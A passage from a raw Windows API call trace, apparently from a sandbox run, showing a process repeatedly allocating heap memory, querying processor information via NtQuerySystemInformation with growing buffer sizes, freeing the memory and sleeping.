[0257.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0257.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0257.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0257.569] Sleep (dwMilliseconds=0x110) [0257.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0257.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0257.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0257.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0257.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0257.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0257.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0257.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0257.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0257.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0257.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0257.630] Sleep (dwMilliseconds=0x110) [0258.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0258.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0258.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0258.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0258.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0258.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0258.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0258.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0258.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0258.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0258.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0258.437] Sleep (dwMilliseconds=0x110) [0258.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0258.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0258.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0258.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0258.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0258.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0258.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0258.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0258.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0258.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0258.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0258.673] Sleep (dwMilliseconds=0x110) [0258.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0258.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0258.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0258.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0258.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0258.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0258.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0258.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0258.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0258.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0258.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0258.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0258.834] Sleep (dwMilliseconds=0x110) [0259.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0259.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0259.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0259.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.043] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0259.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0259.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0259.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0259.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.047] Sleep (dwMilliseconds=0x110) [0259.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0259.072] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0259.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0259.073] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0259.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0259.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0259.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0259.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0259.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.085] Sleep (dwMilliseconds=0x110) [0259.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0259.105] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.106] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0259.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0259.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0259.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0259.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0259.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0259.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0259.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.114] Sleep (dwMilliseconds=0x110) [0259.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0259.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0259.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0259.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0259.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0259.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0259.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0259.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0259.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.131] Sleep (dwMilliseconds=0x110) [0259.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0259.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0259.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0259.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0259.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0259.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0259.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0259.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0259.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.162] Sleep (dwMilliseconds=0x110) [0259.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0259.399] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.400] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0259.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0259.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.400] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0259.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0259.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0259.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0259.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0259.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.407] Sleep (dwMilliseconds=0x110) [0259.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0259.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0259.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0259.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0259.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0259.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0259.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0259.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0259.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.429] Sleep (dwMilliseconds=0x110) [0259.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0259.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0259.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0259.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0259.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0259.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0259.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0259.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0259.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.438] Sleep (dwMilliseconds=0x110) [0259.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0259.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0259.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0259.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0259.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0259.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0259.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0259.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0259.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.492] Sleep (dwMilliseconds=0x110) [0259.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0259.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0259.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0259.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0259.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0259.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0259.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0259.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, 